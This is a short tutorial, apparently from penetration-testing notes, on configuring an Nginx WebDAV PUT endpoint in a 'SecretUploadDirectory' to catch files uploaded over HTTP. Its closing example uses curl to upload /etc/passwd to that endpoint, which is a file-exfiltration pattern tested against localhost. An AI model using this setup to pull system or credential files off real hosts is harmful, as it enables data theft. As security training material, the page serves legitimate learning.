# Catching Files over HTTP/S (Nginx)

## **Create a Directory to Handle Uploaded Files**

```bash
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
```

## **Change the Owner to www-data**

```bash
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
```

**Create Nginx Configuration File**

Create the Nginx configuration file by creating the file `/etc/nginx/sites-available/upload.conf` with the contents:

## Catching Files over HTTP/S

```shell-session
server {
    listen 9001;
    
    location /SecretUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
    }
}
```

## **Symlink our Site to the sites-enabled Directory**

```bash
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
```

## Start Nginx

```bash
sudo systemctl restart nginx.service
```

## Errors

If we get any error messages, check `/var/log/nginx/error.log`

```bash
tail -2 /var/log/nginx/error.log
```

```bash
ss -lnpt | grep <port>
```

```bash
ps -ef | grep <PID>
```

### **Remove NginxDefault Configuration**

```bash
sudo rm /etc/nginx/sites-enabled/default
```

## **Upload File Using cURL**

```bash
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
```

{% hint style="info" %}
Once we have this working, a good test is to ensure the directory listing is not enabled by navigating to `http://localhost/SecretUploadDirectory`
{% endhint %}